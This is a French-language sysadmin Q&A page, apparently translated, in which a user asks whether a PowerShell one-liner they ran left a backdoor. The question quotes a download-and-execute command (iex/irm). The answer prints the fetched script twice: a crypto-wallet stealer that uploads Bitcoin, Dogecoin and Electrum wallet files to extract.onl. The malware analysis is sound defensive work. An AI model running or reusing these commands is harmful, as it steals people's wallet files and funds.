71 votes

J'ai exécuté un script PowerShell. Ai-je été piraté ?

J'ai été idiot et je me suis fait avoir en exécutant un script PowerShell. Quels en sont les détails ? J'ai l'impression qu'ils n'ont téléchargé que quelques fichiers de mon système.

Mais je crains qu'il reste une porte dérobée ouverte sur mon système. Le téléchargement je peux m'en accommoder, mais pas une porte dérobée.

Attention! Ne pas exécuter ce script.

iex "& { $(irm

(J'ai séparé ceci en deux lignes pour éviter de l'exécuter involontairement)

powershell.software/versioncheck) } RunJob"

Attention! Ne pas exécuter ce script.

104voto

pigeonburger Points 1866

AVERTISSEMENT : NE PAS EXÉCUTER LE CODE DE CETTE RÉPONSE. IL EST MALVEILLANT ET N'EST INCLUS QU'À DES FINS DE DÉMONSTRATION.

powershell.software/versioncheck est un lien malveillant

La page vers laquelle il mène ressemble à ceci :

$ErrorActionPreference = 'silentlycontinue'
Write-Host "Vérification de la dernière version..."
Invoke-RestMethod -method PUT -infile ~\desktop\backups\found.wallet extract.onl/logs
Invoke-RestMethod -method PUT -infile .\found.wallet extract.onl/desktop
Invoke-RestMethod -method PUT -infile .\multidoge.wallet extract.onl/seed
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Dogecoin\wallet.dat extract.onl/doge
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Bitcoin\wallet.dat extract.onl/bitcoin
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge.wallet extract.onl/multidoge/wallet
Compress-Archive -Path ~\Appdata\Roaming\MultiDoge\multidoge-data -DestinationPath ~\Appdata\Roaming\MultiDoge\multidoge-data
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge-data.zip extract.onl/multidoge/backups
Write-Host "Vous utilisez actuellement 7.1.4 Windows PowerShell, Java 2021"
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Electrum\wallets\default_wallet extract.onl/electrum

body {
  background-color: black;
}

Lorsque vous essayez de visiter ce lien dans un navigateur, il vous redirige rapidement loin de cette page, vers une autre page prétendant (mal) que le site n'existe pas :

Lorsqu'exécuté dans la commande complète que vous avez fournie, cependant, il reconnaît les lignes suivantes comme des commandes PowerShell :

$ErrorActionPreference = 'silentlycontinue'
Write-Host "Vérification de la dernière version..."
Invoke-RestMethod -method PUT -infile ~\desktop\backups\found.wallet extract.onl/logs
Invoke-RestMethod -method PUT -infile .\found.wallet extract.onl/desktop
Invoke-RestMethod -method PUT -infile .\multidoge.wallet extract.onl/seed
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Dogecoin\wallet.dat extract.onl/doge
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Bitcoin\wallet.dat extract.onl/bitcoin
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge.wallet extract.onl/multidoge/wallet
Compress-Archive -Path ~\Appdata\Roaming\MultiDoge\multidoge-data -DestinationPath ~\Appdata\Roaming\MultiDoge\multidoge-data
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge-data.zip extract.onl/multidoge/backups
Write-Host "Vous utilisez actuellement 7.1.4 Windows PowerShell, Java 2021"
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Electrum\wallets\default_wallet extract.onl/electrum

C'est un voleur de portefeuille de cryptomonnaie primitif. Chaque ligne commençant par Invoke-RestMethod tente d'envoyer des données provenant d'autres portefeuilles de cryptomonnaie possibles (si vous en avez installé sur votre ordinateur) vers une page sur le point de terminaison http://extract.onl.

Si vous avez des portefeuilles de cryptomonnaie sur l'ordinateur, ils sont maintenant probablement compromis. Transférez tout ce qu'ils contiennent vers un autre portefeuille SÉCURISÉ.

Résumant vos préoccupations :

J'ai l'impression qu'ils n'ont téléchargé que quelques fichiers de mon système.

Mais je crains qu'il puisse rester une porte dérobée en fonctionnement sur mon système. Le téléchargement, je peux vivre avec, mais pas une porte dérobée.

Oui, si ces fichiers sur votre ordinateur existaient, ils ont été téléchargés. Cependant, c'est tout ce que ce script semble faire, donc il n'y a pas de porte dérobée persistante laissée sur votre système.


Édition 25/10/2021 :

Depuis la rédaction de cette réponse, l'accès au code malveillant à l'adresse powershell.software/versioncheck est maintenant bloqué (et entraîne désormais une erreur 403), mais pourrait revenir à tout moment. C'est toujours un risque.

Édition 24/01/2022 :

Le propriétaire de powershell.software/versioncheck a remis en ligne le code malveillant. C'est toujours un risque.

SistemesEz.com

SystemesEZ est une communauté de sysadmins où vous pouvez résoudre vos problèmes et vos doutes. Vous pouvez consulter les questions des autres sysadmins, poser vos propres questions ou résoudre celles des autres.

Powered by:

X